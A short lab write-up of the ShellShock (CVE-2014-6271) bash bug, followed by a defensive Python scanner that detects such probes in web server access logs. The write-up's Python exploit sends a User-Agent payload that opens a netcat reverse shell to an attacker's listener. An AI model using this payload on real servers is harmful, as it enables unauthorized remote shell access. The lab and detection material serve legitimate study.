CVE-2014-6271 ShellShock
A short pentest from @PentesterLab

Toufik Airane
www.tfairane.com
October 26, 2014

Contents

1 Preface
  1.1 disclaimer
  1.2 whoami
2 Ok, at 3 ! 3 ... (running)
3 Get lucky

1 Preface

1.1 disclaimer

This paper exists for educational purposes only.

1.2 whoami

I'm a French student studying computer science. Snoop at his lost time, ...

2 Ok, at 3 ! 3 ... (running)

An exercise released by @PentesterLab about the recent buzz, namely CVE-2014-6271 'ShellShock'.

@VulnHub : http://vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/

Figure 1: @PentesterLab you like fruits ?

Figure 2: man cve-2014-6271

Figure 3: CGI exploitation

3 Get lucky

    #!/bin/python
    # Python 2 script (print statements); requires the requests library.
    import requests
    import json
    import sys

    # Command-line arguments: CGI URL of the lab VM, listener address, listener port.
    target = str(sys.argv[1])
    attack = str(sys.argv[2])
    port = str(sys.argv[3])
    print "CVE-2014-6271 ShellShock CGI-BIN User-Agent"
    print "payload # () { :;}; /bin/bash -c 'nc attack port -e /bin/sh'"
    # The User-Agent value starts with a bash function definition, followed by a command.
    payload = "() { :;}; /bin/bash -c 'nc "+attack+" "+port+" -e /bin/sh'"
    headers = {'User-agent' : payload}
    r = requests.get(target, headers=headers)
    print r.text

So ! Pouf ! root ! Thank you.
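On the defending side, the User-Agent value sent by the script above lands in the web server's access log. The following is an added example, not part of the original paper: a small Python scanner that flags logged header values starting like a bash function definition. The Combined Log Format, the function name find_shellshock_probes and the sample log lines are assumptions made for illustration.

```python
import re

# Assumption: logs are in Apache/nginx Combined Log Format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Vulnerable bash treats an environment value that starts with "() {" as a
# function definition, so match only at the start of the header value.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

HEADER_FIELDS = ("referer", "agent")


def find_shellshock_probes(lines):
    """Return one finding per logged header value that starts like a bash function."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LOG_LINE.match(line.strip())
        if m is None:
            continue  # not Combined Log Format; skipped in this sketch
        for field in HEADER_FIELDS:
            if FUNC_PREFIX.search(m.group(field)):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "field": field,
                    "cgi": "/cgi-bin/" in m.group("request"),
                    "status": int(m.group("status")),
                })
    return findings


# Constructed sample log lines (documentation IP ranges, harmless echo command).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [26/Oct/2014:10:00:05 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 212 "-" "() { :;}; /bin/echo probe"',
    '198.51.100.7 - - [26/Oct/2014:10:00:09 +0000] "GET / HTTP/1.1" 404 162 "() { :; }; /bin/echo probe" "curl/7.38.0"',
    '192.0.2.44 - - [26/Oct/2014:10:01:12 +0000] "GET /app.js HTTP/1.1" 200 880 "-" "ExampleBot/1.0 (+http://example.com/bot) {beta}"',
]

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

A default access log records only the Referer and User-Agent headers, so the same prefix sent in another header (Cookie, for instance) is visible only where full request headers are captured, such as a WAF or proxy log.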